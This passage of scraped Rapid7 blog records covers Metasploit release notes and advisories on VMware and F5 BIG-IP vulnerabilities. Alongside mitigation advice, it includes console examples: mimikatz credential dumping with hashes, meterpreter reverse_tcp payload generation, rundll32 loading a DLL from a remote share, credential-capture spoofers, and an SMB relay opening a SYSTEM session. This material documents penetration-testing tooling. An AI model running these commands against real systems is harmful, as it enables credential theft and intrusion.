a new module for [CVE-2022-29464](<https://www.rapid7.com/blog/post/2022/04/22/opportunistic-exploitation-of-wso2-cve-2022-29464/>). Multiple WSO2 products are vulnerable to an unrestricted file upload vulnerability that results in RCE. This module builds a `java/meterpreter/reverse_tcp` payload inside a WAR file and uploads it to the target via the vulnerable file upload. It then executes the payload to open a session. 
A full technical analysis can be found on the official [Rapid7 Analysis](<https://attackerkb.com/topics/zO1gNHJgcZ/cve-2022-29464/rapid7-analysis?referrer=blog>)\n\n## Kiwi Meterpreter Updates - Windows 11 Support\n\nThe Meterpreter Kiwi extension has been updated to pull in the latest changes from the upstream [mimikatz project](<https://github.com/gentilkiwi/mimikatz>). Notably this adds support for Windows 11 when running the `creds_all` command within a Meterpreter console:\n \n \n meterpreter > getsystem\n ...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).\n meterpreter > getuid\n Server username: NT AUTHORITY\\SYSTEM\n meterpreter > load kiwi\n Loading extension kiwi\u2026\n .#####. mimikatz 2.2.0 20191125 (x64/windows)\n .## ^ ##. \"A La Vie, A L'Amour\" - (oe.eo)\n ## / \\ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )\n ## \\ / ## > http://blog.gentilkiwi.com/mimikatz\n '## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )\n '#####' > http://pingcastle.com / http://mysmartlogon.com ***/\n Success.\n meterpreter > sysinfo\n Computer : WIN11-TEST\n OS : Windows 10 (10.0 Build 22000).\n Architecture : x64\n System Language : en_US\n Domain : TESTINGDOMAIN\n Logged On Users : 11\n Meterpreter : x64/windows\n meterpreter > creds_all\n [+] Running as SYSTEM\n [*] Retrieving all credentials\n msv credentials\n ===============\n \n Username Domain NTLM SHA1\n -------- ------ ---- ----\n WIN11-TEST$ TESTINGDOMAIN a133becebb8e22321dbf26bf8d90f398 dbf0ad587f62004306f435903fb3a516da6ba104\n ... 
etc etc ...\n \n\n## New module content (3)\n\n * [VMware Workspace ONE Access CVE-2022-22954](<https://github.com/rapid7/metasploit-framework/pull/16512>) by wvu, Udhaya Prakash, and mr_me, which exploits [CVE-2022-22954](<https://attackerkb.com/topics/BDXyTqY1ld/cve-2022-22954?referrer=blog>) \\- This adds an exploit for CVE-2022-22954 which is an unauthenticated RCE in VMWare Workspace ONE Access.\n * [WSO2 Arbitrary File Upload to RCE](<https://github.com/rapid7/metasploit-framework/pull/16507>) by wvu, Jack Heysel, Orange Tsai, and hakivvi, which exploits [CVE-2022-29464](<https://attackerkb.com/topics/zO1gNHJgcZ/cve-2022-29464?referrer=blog>) \\- This adds an exploit for CVE-2022-29464 which is an arbitrary file upload vulnerability in multiple WSO2 products that can be used to obtain remote code execution.\n * [ZoneMinder Language Settings Remote Code Execution](<https://github.com/rapid7/metasploit-framework/pull/16514>) by krastanoel, which exploits [CVE-2022-29806](<https://attackerkb.com/topics/UExWSYmybq/cve-2022-29806?referrer=blog>) \\- This leverages a directory traversal and arbitrary file write in vulnerable versions of ZoneMinder to achieve remote code execution as the `www-data` user.\n\n## Enhancements and features (2)\n\n * [#16445](<https://github.com/rapid7/metasploit-framework/pull/16445>) from [dwelch-r7](<https://github.com/dwelch-r7>) \\- The Windows Meterpreter payload now supports a `MeterpreterDebugLogging` datastore option for logging debug information to a file. 
Example usage:\n \n \n use windows/x64/meterpreter_reverse_tcp\n set MeterpreterDebugBuild true\n set MeterpreterDebugLogging rpath:C:/test/foo.txt\n save\n generate -f exe -o shell.exe\n to_handler\n \n\n * [#16462](<https://github.com/rapid7/metasploit-framework/pull/16462>) from [bcoles](<https://github.com/bcoles>) \\- Adds support for armle/aarch64 architectures to `gdb_server_exec`\n\n## Bugs fixed (2)\n\n * [#16526](<https://github.com/rapid7/metasploit-framework/pull/16526>) from [jheysel-r7](<https://github.com/jheysel-r7>) \\- The version of Meterpreter Payloads has been upgraded to pull in a fix that will ensure that the Kiwi extension can now work properly on Windows 11 hosts and correctly dump credentials vs failing silently as it was doing previously.\n * [#16530](<https://github.com/rapid7/metasploit-framework/pull/16530>) from [sjanusz-r7](<https://github.com/sjanusz-r7>) \\- This updates the `pihole_remove_commands_lpe` module to no longer break sessions when running the check method.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` \nand you can get more details on the changes since the last blog post from \nGitHub:\n\n * [Pull Requests 6.1.40...6.1.41](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222022-04-28T13%3A01%3A56%2B02%3A00..2022-05-05T11%3A16%3A04-05%3A00%22>)\n * [Full diff 6.1.40...6.1.41](<https://github.com/rapid7/metasploit-framework/compare/6.1.40...6.1.41>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. 
\nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the \n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-06T17:56:15", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22954", "CVE-2022-29464", "CVE-2022-29806"], "modified": "2022-05-06T17:56:15", "id": "RAPID7BLOG:1ECBAB52CD82AE516E383F64D607FEF9", "href": "https://blog.rapid7.com/2022/05/06/metasploit-wrap-up-154/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-20T21:31:04", "description": "\n\nOn May 18, 2022, VMware published [VMSA-2022-0014](<https://www.vmware.com/security/advisories/VMSA-2022-0014.html>) on CVE-2022-22972 and CVE-2022-22973. 
The more severe of the two vulnerabilities is CVE-2022-22972, a critical authentication bypass affecting VMware\u2019s Workspace ONE Access, Identity Manager, and vRealize Automation solutions. The vulnerability allows attackers with network access to the UI to obtain administrative access without the need to authenticate. CVE-2022-22972 may be chained with CVE-2022-22973 to bypass authentication and obtain root access. A full list of affected products is available in [VMware\u2019s advisory](<https://www.vmware.com/security/advisories/VMSA-2022-0014.html>).\n\nAt the time of writing, there is no public proof of concept for CVE-2022-22972, and there have been no reports of exploitation in the wild. We expect this to change quickly, however, since Rapid7 researchers have seen [similar VMware vulnerabilities](<https://attackerkb.com/topics/BDXyTqY1ld/cve-2022-22954/rapid7-analysis?referrer=blog>) come under attack quickly in recent weeks. In April 2022, we [published details on CVE-2022-22954](<https://www.rapid7.com/blog/post/2022/04/29/widespread-exploitation-of-vmware-workspace-one-access-cve-2022-22954/>), a server-side template injection flaw that was widely exploited by threat actors targeting internet-facing VMware Workspace ONE and Identity Manager applications.\n\nIn conjunction with VMware\u2019s advisory on May 18, the US Cybersecurity and Infrastructure Security Agency (CISA) published [Emergency Directive 22-03](<https://www.cisa.gov/emergency-directive-22-03>) in response to VMSA-2022-0014. The directive requires all \u201cFederal Civilian Executive Branch\u201d agencies to either apply the patch or remove affected VMware installations from agency networks by May 24, 2022. CISA also released an [additional alert](<https://www.cisa.gov/uscert/ncas/alerts/aa22-138b>) emphasizing that threat actors are known to be chaining recent VMware vulnerabilities \u2014 CVE-2022-22954 and CVE-2022-22960 \u2014 to gain full control of vulnerable systems. 
CISA\u2019s alert notes that the new vulnerabilities in VMSA-2022-0014 are likely to be exploited in the wild quickly:\n\n> Due to the [likely] rapid exploitation of these vulnerabilities, CISA strongly encourages all organizations with affected VMware products that are accessible from the internet \u2014 that did not immediately apply updates \u2014 to assume compromise.\n\n## Mitigation guidance\n\nVMware customers should patch their Workspace ONE Access, Identity Manager, and vRealize Automation installations immediately, without waiting for a regular patch cycle to occur. VMware has instructions [here](<https://kb.vmware.com/s/article/88438>) on patching and applying [workarounds](<https://kb.vmware.com/s/article/88098>).\n\nAdditionally, if your installation is internet-facing, consider taking steps to remove direct access from the internet. It may also be prudent to follow CISA\u2019s guidance on post-exploitation detection methods found in [Alert (AA22-138B)](<https://www.cisa.gov/uscert/ncas/alerts/aa22-138b>).\n\n## Rapid7 customers\n\nInsightVM and Nexpose customers will be able to assess their VMware Workspace ONE Access and Identity Manager systems\u2019 exposure to CVE-2022-22972 and CVE-2022-22973 with authenticated vulnerability checks for Unix-like systems available in the May 20, 2022 content release. (Note that VMware Workspace ONE Access is only able to be deployed on Linux from 20.x onward.) Additional vulnerability coverage will be evaluated as the need arises.\n\n_Note: The original version of this blog post indicated that Rapid7 VM customers could expect coverage in the May 19 content release. 
Due to unforeseen complications with detecting VMware's hotfix patch, there was a delay and the checks will be available in the May 20 content release._", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-19T13:54:07", "type": "rapid7blog", "title": "CVE-2022-22972: Critical Authentication Bypass in VMware Workspace ONE Access, Identity Manager, and vRealize Automation", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22954", "CVE-2022-22960", "CVE-2022-22972", "CVE-2022-22973"], "modified": "2022-05-19T13:54:07", "id": "RAPID7BLOG:A84DC7A15FD5A2A6BF1C8389827A8B0D", "href": "https://blog.rapid7.com/2022/05/19/cve-2022-22972-critical-authentication-bypass-in-vmware-workspace-one-access-identity-manager-and-vrealize-automation/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T19:31:05", "description": "\n\nOn May 4, 2022, F5 released [an advisory](<https://support.f5.com/csp/article/K55879220>) listing several vulnerabilities, including 
[CVE-2022-1388](<https://support.f5.com/csp/article/K23605346>), a critical authentication bypass that leads to remote code execution in iControl REST with a CVSSv3 base score of 9.8.\n\nThe vulnerability affects several different versions of BIG-IP prior to 17.0.0, including:\n\n * F5 BIG-IP 16.1.0 - 16.1.2 (patched in 16.1.2.2)\n * F5 BIG-IP 15.1.0 - 15.1.5 (patched in 15.1.5.1)\n * F5 BIG-IP 14.1.0 - 14.1.4 (patched in 14.1.4.6)\n * F5 BIG-IP 13.1.0 - 13.1.4 (patched in 13.1.5)\n * F5 BIG-IP 12.1.0 - 12.1.6 (no patch available, will not fix)\n * F5 BIG-IP 11.6.1 - 11.6.5 (no patch available, will not fix)\n\nOn Monday, May 9, 2022, [Horizon3](<https://www.horizon3.ai/>) released a [full proof of concept](<https://github.com/horizon3ai/CVE-2022-1388>), which we successfully executed to get a root shell. Other groups have [developed exploits](<https://www.bleepingcomputer.com/news/security/exploits-created-for-critical-f5-big-ip-flaw-install-patch-immediately/>) as well.\n\nOver the past few days, [BinaryEdge](<https://www.binaryedge.io/>) has detected an increase in [scanning and exploitation](<https://twitter.com/Balgan/status/1523683322446381059>) for F5 BIG-IP. Others on Twitter have also [observed exploitation attempts](<https://twitter.com/1ZRR4H/status/1523572874061422593>). Due to the ease of exploiting this vulnerability, the public exploit code, and the fact that it provides root access, exploitation attempts are likely to increase.\n\nWidespread exploitation is somewhat mitigated by the small number of internet-facing F5 BIG-IP devices; however, our best guess is that there are only [about 2,500 targets on the internet](<https://twitter.com/Junior_Baines/status/1522205355287228416>).\n\n## Mitigation guidance\n\nF5 customers should patch their BIG-IP devices as quickly as possible using [F5's upgrade instructions](<https://support.f5.com/csp/article/K84205182>). 
Additionally, the management port for F5 BIG-IP devices (and any similar appliance) should be tightly controlled at the network level \u2014 only authorized users should be able to reach the management interface at all.\n\nF5 also [provides a workaround as part of their advisory](<https://support.f5.com/csp/article/K23605346>). If patching and network segmentation are not possible, the workaround should prevent exploitation. We always advise patching rather than relying solely on workarounds.\n\nExploit attempts appear in at least [two different log files](<https://twitter.com/n0x08/status/1523701663290122240>):\n\n * /var/log/audit\n * /var/log/restjavad-audit.0.log\n\nBecause this vulnerability is a root compromise, successful exploitation may be very difficult to recover from. At a minimum, affected BIG-IP devices should be rebuilt from scratch, and certificates and passwords should be rotated.\n\n## Rapid7 customers\n\nInsightVM and Nexpose customers can assess their exposure to CVE-2022-1388 with an authenticated [vulnerability check](<https://www.rapid7.com/db/vulnerabilities/f5-big-ip-cve-2022-1388/>) in the May 5, 2022 content release. 
This release also includes authenticated vulnerability checks for additional CVEs in F5's [May 2022 security advisory](<https://support.f5.com/csp/article/K55879220>).\n\n_**Additional reading:**_\n\n * _[Widespread Exploitation of VMware Workspace ONE Access CVE-2022-22954](<https://www.rapid7.com/blog/post/2022/04/29/widespread-exploitation-of-vmware-workspace-one-access-cve-2022-22954/>)_\n * _[Opportunistic Exploitation of WSO2 CVE-2022-29464](<https://www.rapid7.com/blog/post/2022/04/22/opportunistic-exploitation-of-wso2-cve-2022-29464/>)_\n * _[Spring4Shell: Zero-Day Vulnerability in Spring Framework (CVE-2022-22965)](<https://www.rapid7.com/blog/post/2022/03/30/spring4shell-zero-day-vulnerability-in-spring-framework/>)_\n * _[CVE-2022-0847: Arbitrary File Overwrite Vulnerability in Linux Kernel](<https://www.rapid7.com/blog/post/2022/03/09/cve-2022-0847-arbitrary-file-overwrite-vulnerability-in-linux-kernel/>)_", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-09T17:57:00", "type": "rapid7blog", "title": "Active Exploitation of F5 BIG-IP iControl REST CVE-2022-1388", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": 
"2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-0847", "CVE-2022-1388", "CVE-2022-22954", "CVE-2022-22965", "CVE-2022-29464"], "modified": "2022-05-09T17:57:00", "id": "RAPID7BLOG:07CA09B4E3B3835E096AA56546C43E8E", "href": "https://blog.rapid7.com/2022/05/09/active-exploitation-of-f5-big-ip-icontrol-rest-cve-2022-1388/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-09T17:36:33", "description": "\n\nMetasploit 6.2.0 has been released, marking another milestone that includes new modules, features, improvements, and bug fixes. Since Metasploit 6.1.0 (August 2021) until the latest Metasploit 6.2.0 release we\u2019ve added:\n\n * 138 new modules\n * 148 enhancements and features\n * 156 bug fixes\n\n## Top modules\n\nEach week, the Metasploit team publishes a [Metasploit wrap-up](<https://www.rapid7.com/blog/tag/metasploit-weekly-wrapup/>) with granular release notes for new Metasploit modules. Below is a list of some recent modules that pen testers have told us they are actively using on engagements (with success).\n\n**Remote Exploitation**\n\n * [VMware vCenter Server Unauthenticated JNDI Injection RCE (via Log4Shell)](<https://github.com/rapid7/metasploit-framework/pull/16050>) by RageLtMan, Spencer McIntyre, jbaines-r7, and w3bd3vil, which exploits [CVE-2021-44228](<https://attackerkb.com/topics/in9sPR2Bzt/cve-2021-44228-log4shell?referrer=blog>): A vCenter-specific exploit leveraging the Log4Shell vulnerability to achieve unauthenticated RCE as `root` / `SYSTEM`. 
This exploit has been tested on both Windows and Linux targets.\n * [F5 BIG-IP iControl RCE via REST Authentication Bypass](<https://github.com/rapid7/metasploit-framework/pull/16549>) by Heyder Andrade, James Horseman, Ron Bowes, and alt3kx, which exploits [CVE-2022-1388](<https://attackerkb.com/topics/SN5WCzYO7W/cve-2022-1388?referrer=blog>): This module targets CVE-2022-1388, a vulnerability impacting F5 BIG-IP versions prior to 16.1.2.2. By making a special request, an attacker can bypass iControl REST authentication and gain access to administrative functionality. This can be used by unauthenticated attackers to execute arbitrary commands as the `root` user on affected systems.\n * [VMware Workspace ONE Access CVE-2022-22954](<https://github.com/rapid7/metasploit-framework/pull/16512>) by wvu, Udhaya Prakash, and mr_me, which exploits [CVE-2022-22954](<https://attackerkb.com/topics/BDXyTqY1ld/cve-2022-22954?referrer=blog>): This module exploits an unauthenticated remote code execution flaw in VMWare Workspace ONE Access installations; the vulnerability is being used broadly in the wild.\n * [Zyxel Firewall ZTP Unauthenticated Command Injection](<https://github.com/rapid7/metasploit-framework/pull/16563>) by jbaines-r7, which exploits [CVE-2022-30525](<https://attackerkb.com/topics/LbcysnvxO2/cve-2022-30525?referrer=blog>): This module targets CVE-2022-30525, an unauthenticated remote command injection vulnerability affecting Zyxel firewalls with zero touch provisioning (ZTP) support. Successful exploitation results in remote code execution as the `nobody` user. 
The vulnerability was [discovered](<https://www.rapid7.com/blog/post/2022/05/12/cve-2022-30525-fixed-zyxel-firewall-unauthenticated-remote-command-injection/>) by Rapid7 researcher [Jake Baines](<https://github.com/jbaines-r7>).\n\n**Local Privilege Escalation**\n\n * [CVE-2022-21999 SpoolFool Privesc](<https://github.com/rapid7/metasploit-framework/pull/16344>) by Oliver Lyak and Shelby Pace, which exploits [CVE-2022-21999](<https://attackerkb.com/topics/vFYqO85asS/cve-2022-21999?referrer=blog>): A local privilege escalation targeting the spool service on Windows 10 or Server builds 18362 or earlier.\n * [Dirty Pipe Local Privilege Escalation via CVE-2022-0847](<https://github.com/rapid7/metasploit-framework/pull/16303>) by Max Kellermann and timwr, which exploits [CVE-2022-0847](<https://attackerkb.com/topics/UwW7SVPaPv/cve-2022-0847?referrer=blog>): A module targeting a privilege escalation vulnerability in the Linux kernel starting with version 5.8. The module leverages the vulnerability to overwrite a SUID binary in order to gain privileges as the `root` user.\n\n## Capture plugin\n\nCapturing credentials is a critical and early phase in the playbook of many offensive security testers. Metasploit has facilitated this for years with protocol-specific modules all under the `auxiliary/server/capture` namespace. Users can start and configure each of these modules individually, but as of MSF 6.2.0, [a new capture plugin](<https://github.com/rapid7/metasploit-framework/pull/16298>) can also streamline this process for users. The capture plugin currently starts 13 different services (17 including SSL-enabled versions) on the same listening IP address including remote interfaces via Meterpreter.\n\nAfter running the `load capture` command, the `captureg` command is available (for Capture-Global), which then offers start and stop subcommands. 
A configuration file can be used to select individual services to start.\n\nIn the following example, the plugin is loaded, and then all default services are started on the 192.168.123.128 interface:\n \n \n msf6 > load capture\n [*] Successfully loaded plugin: Credential Capture\n msf6 > captureg start --ip 192.168.123.128\n Logging results to /home/kali/.msf4/logs/captures/capture_local_20220518185845_205939.txt\n Hash results stored in /home/kali/.msf4/loot/captures/capture_local_20220518185845_846339\n [+] Authentication Capture: DRDA (DB2, Informix, Derby) started\n [+] Authentication Capture: FTP started\n [+] HTTP Client MS Credential Catcher started\n [+] HTTP Client MS Credential Catcher started\n [+] Authentication Capture: IMAP started\n [+] Authentication Capture: MSSQL started\n [+] Authentication Capture: MySQL started\n [+] Authentication Capture: POP3 started\n [+] Authentication Capture: PostgreSQL started\n [+] Printjob Capture Service started\n [+] Authentication Capture: SIP started\n [+] Authentication Capture: SMB started\n [+] Authentication Capture: SMTP started\n [+] Authentication Capture: Telnet started\n [+] Authentication Capture: VNC started\n [+] Authentication Capture: FTP started\n [+] Authentication Capture: IMAP started\n [+] Authentication Capture: POP3 started\n [+] Authentication Capture: SMTP started\n [+] NetBIOS Name Service Spoofer started\n [+] LLMNR Spoofer started\n [+] mDNS Spoofer started\n [+] Started capture jobs\n \n\nOpening a new terminal in conjunction with the `tail` command will show everything that has been captured. 
For instance, NTLMv2-SSP details through the SMB capture module:\n \n \n $ tail -f ~/.msf4/logs/captures/capture_local_20220518185845_205939.txt\n \n [+] Received SMB connection on Auth Capture Server!\n [SMB] NTLMv2-SSP Client : 192.168.123.136\n [SMB] NTLMv2-SSP Username : EXAMPLE\\Administrator\n [SMB] NTLMv2-SSP Hash : Administrator::EXAMPLE:1122334455667788:c77cd466c410eb0721e4936bebd1c35b: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\n \n\nIt is also possible to log directly to stdout without using the `tail` command:\n \n \n captureg start --ip 192.168.123.128 --stdout\n \n\n## SMB v3 server support\n\nThis work builds upon the SMB v3 client support [added in Metasploit 6.0](<https://www.rapid7.com/blog/post/2020/08/06/metasploit-6-now-under-active-development/>).\n\nMetasploit 6.2.0 contains a new standalone tool for spawning an SMB server that allows read-only access to the current working directory. This new SMB server functionality supports SMB v1/2/3, as well as encryption support for SMB v3.\n\nExample usage:\n \n \n ruby tools/smb_file_server.rb --share-name home --username metasploit --password password --share-point\n \n\nThis can be useful for copying files onto remote targets, or for running remote DLLs:\n \n \n copy \\\\192.168.123.1\\home\\example.txt .\n rundll32.exe \\\\192.168.123.1\\home\\example.dll,0\n \n\nAll remaining Metasploit modules have now been updated to support SMB v3. Some examples:\n\n * `exploit/windows/smb/smb_delivery`: This module outputs a rundll32 command that you can invoke on a remote machine to open a session, such as `rundll32.exe \\\\192.168.123.128\\tHKPx\\WeHnu,0`\n * `exploit/windows/smb/capture`: This module creates a mock SMB server that accepts credentials before returning `NT_STATUS_LOGON_FAILURE`. 
Supports SMB v1, SMB v2, and SMB v3 and captures NTLMv1 and NTLMv2 hashes, which can be used for offline password cracking\n * `exploit/windows/dcerpc/cve_2021_1675_printnightmare`: This update is an improved, all-inclusive exploit that uses the new SMB server, making it unnecessary for the user to deal with Samba.\n * `exploit/windows/smb/smb_relay`: Covered in more detail below.\n\n## Enhanced SMB relay support\n\nThe `windows/smb/smb_relay` has been updated so users can now relay over SMB versions 2 and 3. In addition, the module can now select multiple targets that Metasploit will intelligently cycle through to ensure that it is not wasting incoming connections.\n\nExample module usage:\n \n \n use windows/smb/smb_relay\n set RELAY_TARGETS 192.168.123.4 192.168.123.25\n set JOHNPWFILE ./relay_results.txt\n run\n \n\nIncoming requests have their hashes captured, as well as being relayed to additional targets to run psexec:\n \n \n msf6 exploit(windows/smb/smb_relay) > [*] New request from 192.168.123.22\n [*] Received request for \\admin\n [*] Relaying to next target smb://192.168.123.4:445\n [+] identity: \\admin - Successfully authenticated against relay target smb://192.168.123.4:445\n [SMB] NTLMv2-SSP Client : 192.168.123.4\n [SMB] NTLMv2-SSP Username : \\admin\n [SMB] NTLMv2-SSP Hash : admin:::ecedb28bc70302ee:a88c85e87f7dca568c560a49a01b0af8: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\n \n [*] Received request for \\admin\n [*] identity: \\admin - All targets relayed to\n [*] 192.168.123.4:445 - Selecting PowerShell target\n [*] Received request for \\admin\n [*] identity: \\admin - All targets relayed to\n [*] 192.168.123.4:445 - Executing the payload...\n [+] 192.168.123.4:445 - Service start timed out, OK if running a command or non-service executable...\n [*] Sending stage (175174 bytes) to 192.168.123.4\n [*] Meterpreter session 1 opened (192.168.123.1:4444 -> 192.168.123.4:52771 ) at 2022-03-02 22:24:42 +0000\n \n\nA session will be opened 
on the relay target with the associated credentials:\n \n \n msf6 exploit(windows/smb/smb_relay) > sessions\n \n Active sessions\n ===============\n \n Id Name Type Information Connection\n -- ---- ---- ----------- ----------\n 1 meterpreter x86/windows NT AUTHORITY\\SYSTEM @ DESKTOP-N3MAG5R 192.168.123.1:4444 -> 192.168.123.4:52771 (192.168.123.4)\n \n\nFurther details can be found in the [Metasploit SMB Relay documentation](<https://github.com/rapid7/metasploit-framework/blob/3b524360ed8c40ff765aa3db5de96a441387035f/documentation/modules/exploit/windows/smb/smb_relay.md>).\n\n## Improved pivoting / NATed services support\n\nMetasploit has added features to libraries that provide listening services (like HTTP, FTP, LDAP, etc) to allow them to be bound to an explicit IP address and port combination that is independent of what is typically the SRVHOST option. This is particularly useful for modules that may be used in scenarios where the target needs to connect to Metasploit through either a NAT or port-forward configuration. The use of this feature mimics the existing functionality that\u2019s provided by the reverse_tcp and reverse_http(s) payload stagers.\n\nWhen a user needs the target to connect to 10.2.3.4, the Metasploit user would set that as the SRVHOST. If, however, that IP address is the external interface of a router with a port forward, Metasploit won\u2019t be able to bind to it. To fix that, users can now set the ListenerBindAddress option to one that Metasploit can listen on \u2014 in this case, the IP address that the router will forward the incoming connection to.\n\nFor example, with the network configuration:\n\nPrivate IP: 172.31.21.26 (where Metasploit can bind to) \nExternal IP: 10.2.3.4 (where the target connects to Metasploit)\n\nThe Metasploit module commands would be:\n \n \n # Set where the target connects to Metasploit. 
ListenerBindAddress is a new option.\n set srvhost 10.2.3.4\n set ListenerBindAddress 172.31.21.26\n \n # Set where Metasploit will bind to. ReverseListenerBindAddress is an existing option.\n set lhost 10.2.3.4\n set ReverseListenerBindAddress 172.31.21.26\n \n\n## Debugging Meterpreter sessions\n\nThere are now two ways to debug Meterpreter sessions:\n\n 1. Log all networking requests and responses between msfconsole and Meterpreter, i.e. TLV packets\n 2. Generate a custom Meterpreter debug build with extra logging present\n\n**Log Meterpreter TLV packets**\n\nThis can be enabled for any Meterpreter session and does not require a special debug Metasploit build:\n \n \n msf6 > setg SessionTlvLogging true\n SessionTlvLogging => true\n \n\nHere\u2019s an example of logging the network traffic when running the `getenv` Meterpreter command:\n \n \n meterpreter > getenv USER\n \n SEND: #<Rex::Post::Meterpreter::Packet type=Request tlvs=[\n #<Rex::Post::Meterpreter::Tlv type=COMMAND_ID meta=INT value=1052 command=stdapi_sys_config_getenv>\n #<Rex::Post::Meterpreter::Tlv type=REQUEST_ID meta=STRING value=\"73717259684850511890564936718272\">\n #<Rex::Post::Meterpreter::Tlv type=ENV_VARIABLE meta=STRING value=\"USER\">\n ]>\n \n RECV: #<Rex::Post::Meterpreter::Packet type=Response tlvs=[\n #<Rex::Post::Meterpreter::Tlv type=UUID meta=RAW value=\"Q\\xE63_onC\\x9E\\xD71\\xDE3\\xB5Q\\xE24\">\n #<Rex::Post::Meterpreter::Tlv type=COMMAND_ID meta=INT value=1052 command=stdapi_sys_config_getenv>\n #<Rex::Post::Meterpreter::Tlv type=REQUEST_ID meta=STRING value=\"73717259684850511890564936718272\">\n #<Rex::Post::Meterpreter::Tlv type=RESULT meta=INT value=0>\n #<Rex::Post::Meterpreter::GroupTlv type=ENV_GROUP tlvs=[\n #<Rex::Post::Meterpreter::Tlv type=ENV_VARIABLE meta=STRING value=\"USER\">\n #<Rex::Post::Meterpreter::Tlv type=ENV_VALUE meta=STRING value=\"demo_user\">\n ]>\n ]>\n \n Environment Variables\n =====================\n \n Variable Value\n -------- -----\n USER 
demo_user\n \n\n**Meterpreter debug builds**\n\nWe have added additional options to Meterpreter payload generation for generating debug builds that will have additional log statements present. These payloads can be useful for debugging Meterpreter sessions, when developing new Meterpreter features, or for raising Metasploit issue reports etc. To choose a prebuilt Meterpreter payload with debug functionality present, set `MeterpreterDebugBuild` to true. There is also configuration support for writing the log output to stdout or to a file on the remote target by setting `MeterpreterDebugLogging` to `rpath:/tmp/meterpreter_log.txt`.\n\nFor example, within msfconsole you can generate a new payload and create a handler:\n \n \n use payload/python/meterpreter_reverse_tcp\n generate -o shell.py -f raw lhost=127.0.0.1 MeterpreterDebugBuild=true MeterpreterTryToFork=false\n to_handler\n \n\nRunning the payload will show the Meterpreter log output:\n \n \n $ python3 shell.py\n DEBUG:root:[*] running method core_negotiate_tlv_encryption\n DEBUG:root:[*] Negotiating TLV encryption\n DEBUG:root:[*] RSA key: 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\n DEBUG:root:[*] AES key: 0x121565e60770fccfc7422960bde14c12193baa605c4fdb5489d9bbd6b659f966\n DEBUG:root:[*] Encrypted AES key: 